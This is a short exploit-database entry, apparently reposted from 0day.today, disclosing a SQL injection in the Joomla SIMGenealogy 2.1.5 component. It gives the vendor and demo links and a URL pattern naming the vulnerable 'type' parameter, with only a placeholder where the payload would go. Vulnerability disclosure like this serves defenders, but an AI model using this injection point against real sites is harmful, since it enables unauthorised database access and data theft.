id: 28238
date: 08/02/2017
title: Joomla SIMGenealogy 2.1.5 Component - SQL Injection Vulnerability
author: Ihsan Sencan
cves: 

# # # # #
# Exploit Title: Joomla! Component SIMGenealogy v2.1.5 - SQL Injection
# Dork: N/A
# Date: 02.08.2017
# Vendor : https://www.simbunch.com/
# Software: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/simgenealogy/
# Demo: https://www.simbunch.com/demos/simgenealogy
# Version: 2.1.5
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_simgenealogy&view=latest&type=[SQL]
# Etc..
# # # # #

#  0day.today [2023-03-25]  #